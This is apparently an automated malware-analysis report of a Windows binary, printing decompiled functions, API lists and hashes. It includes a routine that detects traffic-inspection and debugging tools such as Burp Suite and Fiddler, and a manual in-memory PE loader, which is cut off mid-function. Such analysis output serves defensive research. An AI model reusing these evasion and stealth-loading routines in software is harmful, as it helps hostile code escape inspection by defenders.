                                                                                                                                                      0x004014ac
                                                                                                                                                      0x004014bf
                                                                                                                                                      0x004014cb
                                                                                                                                                      0x004014d9
                                                                                                                                                      0x004014dc
                                                                                                                                                      0x004014df
                                                                                                                                                      0x004014e6
                                                                                                                                                      0x004014ee
                                                                                                                                                      0x004014ef
                                                                                                                                                      0x004014f3
                                                                                                                                                      0x004014f3
                                                                                                                                                      0x004014fd
                                                                                                                                                      0x00401654
                                                                                                                                                      0x0040165c
                                                                                                                                                      0x00401670

                                                                                                                                                      APIs
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004013B3
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004013BE
                                                                                                                                                      • GetStockObject.GDI32(00000008), ref: 004013CA
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004013D2
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004013DB
                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004013E4
                                                                                                                                                      • __ftol.LIBCMT ref: 00401439
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401449
                                                                                                                                                      • Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 00401460
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401473
                                                                                                                                                      • Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 0040148D
                                                                                                                                                      • DrawTextA.USER32(?,?,?,?,00000025), ref: 004014CB
                                                                                                                                                      • __ftol.LIBCMT ref: 0040154D
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401574
                                                                                                                                                      • Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 0040158B
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040159E
                                                                                                                                                      • Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 004015B8
                                                                                                                                                      • DrawTextA.USER32(?,?,0062641F,00000019,00000025), ref: 0040161C
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401654
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040165C
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401664
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$Rectangle$Text$Draw__ftol$ColorModeStock
                                                                                                                                                      • String ID: %0.1f %%$%0.1f db$-inf db
                                                                                                                                                      • API String ID: 1744867341-3832817206
                                                                                                                                                      • Opcode ID: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
                                                                                                                                                      • Instruction ID: a77257ee316fdba333d06e361e7088ec18a0b998c7069467a8efb2542bb6b01f
                                                                                                                                                      • Opcode Fuzzy Hash: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
                                                                                                                                                      • Instruction Fuzzy Hash: 2F813AB1508701AFD300DF15DD8596FB7E9FBC8304F404A2DF595A72A0DB78E9058B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100133E0, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E100133E0(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10333818;
					_t40 = TlsSetValue;
					 *0x10333824 = _t7;
					if( *0x10333818 == 0) {
						L6:
						 *0x1033381c = TlsGetValue;
						 *0x10333818 = E10013097;
						 *0x10333820 = _t40;
						 *0x10333824 = TlsFree;
					} else {
						__eflags =  *0x1033381c;
						if( *0x1033381c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10333820;
							if( *0x10333820 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10332c6c = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033381c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100117FA();
							 *0x10333818 = E10012FC8( *0x10333818);
							 *0x1033381c = E10012FC8( *0x1033381c);
							 *0x10333820 = E10012FC8( *0x10333820);
							 *0x10333824 = E10012FC8( *0x10333824);
							_t18 = E1000F88D();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100130CA();
								goto L15;
							} else {
								_push(L10013256);
								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10332c68 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E100148B1(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10332c68);
										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10013107(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100130CA();
					return 0;
				}
			}
















                                                                                                                                                      0x100133e0
                                                                                                                                                      0x100133ec
                                                                                                                                                      0x100133f0
                                                                                                                                                      0x10013410
                                                                                                                                                      0x1001341d
                                                                                                                                                      0x1001342a
                                                                                                                                                      0x1001342f
                                                                                                                                                      0x10013431
                                                                                                                                                      0x10013438
                                                                                                                                                      0x1001343e
                                                                                                                                                      0x10013443
                                                                                                                                                      0x1001345b
                                                                                                                                                      0x10013460
                                                                                                                                                      0x1001346a
                                                                                                                                                      0x10013474
                                                                                                                                                      0x1001347a
                                                                                                                                                      0x10013445
                                                                                                                                                      0x10013445
                                                                                                                                                      0x1001344c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001344e
                                                                                                                                                      0x1001344e
                                                                                                                                                      0x10013455
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013457
                                                                                                                                                      0x10013457
                                                                                                                                                      0x10013459
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013459
                                                                                                                                                      0x10013455
                                                                                                                                                      0x1001344c
                                                                                                                                                      0x1001347f
                                                                                                                                                      0x10013485
                                                                                                                                                      0x10013488
                                                                                                                                                      0x1001348d
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x10013493
                                                                                                                                                      0x1001349a
                                                                                                                                                      0x1001349c
                                                                                                                                                      0x1001349e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100134a4
                                                                                                                                                      0x100134a4
                                                                                                                                                      0x100134ba
                                                                                                                                                      0x100134ca
                                                                                                                                                      0x100134da
                                                                                                                                                      0x100134e7
                                                                                                                                                      0x100134ec
                                                                                                                                                      0x100134f1
                                                                                                                                                      0x100134f3
                                                                                                                                                      0x1001355a
                                                                                                                                                      0x1001355a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100134f5
                                                                                                                                                      0x100134f5
                                                                                                                                                      0x10013506
                                                                                                                                                      0x10013508
                                                                                                                                                      0x1001350b
                                                                                                                                                      0x10013510
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013512
                                                                                                                                                      0x1001351e
                                                                                                                                                      0x10013520
                                                                                                                                                      0x10013524
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013526
                                                                                                                                                      0x10013526
                                                                                                                                                      0x10013527
                                                                                                                                                      0x1001353b
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x10013541
                                                                                                                                                      0x10013542
                                                                                                                                                      0x10013549
                                                                                                                                                      0x1001354f
                                                                                                                                                      0x10013553
                                                                                                                                                      0x10013557
                                                                                                                                                      0x10013557
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x10013524
                                                                                                                                                      0x10013510
                                                                                                                                                      0x100134f3
                                                                                                                                                      0x1001349e
                                                                                                                                                      0x10013563
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133fa
                                                                                                                                                      0x100133fa

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                      • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                        • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                        • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001D,1001355F), ref: 100130F5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                      • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                      • __initptd.LIBCMT ref: 10013542
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      • API String ID: 2657569430-3819984048
                                                                                                                                                      • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                      • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100193D0, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAC0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAC0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAC0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAC0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAC0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10333dcc = 1;
												return 0;
											}
											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10333dcc = 1;
											return 0;
										}
										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10333dcc = 1;
										return 0;
									}
									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10333dcc = 1;
									return 0;
								}
								__eflags = E1000CAC0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10333dcc = 1;
								return 0;
							}
							 *0x10333dcc = 1;
							return 0;
						}
						 *0x10333dcc = 1;
						return 0;
					}
					 *0x10333dcc = 1;
					return 0;
				}
				_t66 = E1000CAC0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10333dcc = 1;
					return 0;
				}
			}


































                                                                                                                                                      0x100193d0
                                                                                                                                                      0x100193d0
                                                                                                                                                      0x100193d9
                                                                                                                                                      0x100193ee
                                                                                                                                                      0x100193f6
                                                                                                                                                      0x1001940b
                                                                                                                                                      0x10019423
                                                                                                                                                      0x10019439
                                                                                                                                                      0x10019446
                                                                                                                                                      0x1001944b
                                                                                                                                                      0x1001944e
                                                                                                                                                      0x10019450
                                                                                                                                                      0x100196a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100196a0
                                                                                                                                                      0x10019462
                                                                                                                                                      0x10019467
                                                                                                                                                      0x1001946c
                                                                                                                                                      0x100194bb
                                                                                                                                                      0x100194c0
                                                                                                                                                      0x100194c3
                                                                                                                                                      0x100194c5
                                                                                                                                                      0x100194e9
                                                                                                                                                      0x100194ee
                                                                                                                                                      0x100194f1
                                                                                                                                                      0x100194f3
                                                                                                                                                      0x10019517
                                                                                                                                                      0x1001951c
                                                                                                                                                      0x1001951f
                                                                                                                                                      0x10019521
                                                                                                                                                      0x10019545
                                                                                                                                                      0x1001954a
                                                                                                                                                      0x1001954d
                                                                                                                                                      0x1001954f
                                                                                                                                                      0x10019599
                                                                                                                                                      0x1001959e
                                                                                                                                                      0x100195a1
                                                                                                                                                      0x100195a3
                                                                                                                                                      0x100195d3
                                                                                                                                                      0x100195da
                                                                                                                                                      0x100195df
                                                                                                                                                      0x100195e2
                                                                                                                                                      0x100195e4
                                                                                                                                                      0x10019614
                                                                                                                                                      0x10019620
                                                                                                                                                      0x10019625
                                                                                                                                                      0x10019628
                                                                                                                                                      0x1001962a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019633
                                                                                                                                                      0x10019638
                                                                                                                                                      0x1001963b
                                                                                                                                                      0x1001963d
                                                                                                                                                      0x10019667
                                                                                                                                                      0x10019676
                                                                                                                                                      0x10019678
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019686
                                                                                                                                                      0x1001968e
                                                                                                                                                      0x10019690
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019692
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001969c
                                                                                                                                                      0x1001964b
                                                                                                                                                      0x10019650
                                                                                                                                                      0x10019653
                                                                                                                                                      0x10019655
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019657
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019661
                                                                                                                                                      0x100195f2
                                                                                                                                                      0x100195f7
                                                                                                                                                      0x100195fa
                                                                                                                                                      0x100195fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195fe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019608
                                                                                                                                                      0x100195b1
                                                                                                                                                      0x100195b6
                                                                                                                                                      0x100195b9
                                                                                                                                                      0x100195bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195c7
                                                                                                                                                      0x10019560
                                                                                                                                                      0x10019562
                                                                                                                                                      0x1001958d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001958d
                                                                                                                                                      0x10019570
                                                                                                                                                      0x10019578
                                                                                                                                                      0x1001957a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001957c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019586
                                                                                                                                                      0x10019523
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001952d
                                                                                                                                                      0x100194f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194ff
                                                                                                                                                      0x100194c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194d1
                                                                                                                                                      0x10019475
                                                                                                                                                      0x1001947d
                                                                                                                                                      0x1001947f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019499
                                                                                                                                                      0x10019499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194a3

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100193EE
                                                                                                                                                      • _memset.LIBCMT ref: 1001940B
                                                                                                                                                      • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                      • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                      • _strlen.LIBCMT ref: 10019446
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                      • _strlen.LIBCMT ref: 10019475
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                      • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                      • API String ID: 1565133231-1140939848
                                                                                                                                                      • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                      • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402E0E, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 265windowtimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • VBCABLE not installed, xrefs: 00402EDD
                                                                                                                                                      • The VB-Audio Virtual Cable named"%s"is not installed..., xrefs: 00402EC6
                                                                                                                                                      • VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required..., xrefs: 00402E9F
                                                                                                                                                      • VB-Audio Virtual Cable, xrefs: 00402EBD
                                                                                                                                                      • VBCABLE Control Error, xrefs: 00402E9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePaint$BeginKillPostProcQuitTimerWindow
                                                                                                                                                      • String ID: The VB-Audio Virtual Cable named"%s"is not installed...$VB-Audio Virtual Cable$VBCABLE Control Error$VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required...$VBCABLE not installed
                                                                                                                                                      • API String ID: 3845133221-3942928297
                                                                                                                                                      • Opcode ID: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
                                                                                                                                                      • Instruction ID: bb4cc1059bb1b6754256c31f6ab098d666290e2db6be54662162045ecf1f366d
                                                                                                                                                      • Opcode Fuzzy Hash: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
                                                                                                                                                      • Instruction Fuzzy Hash: 7A711DB26052006FD320DB58EC56FEB3758EBC5314F04443AF688A71C2E7B9A56586EF
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001B620, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 350libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AE40(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AE80(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
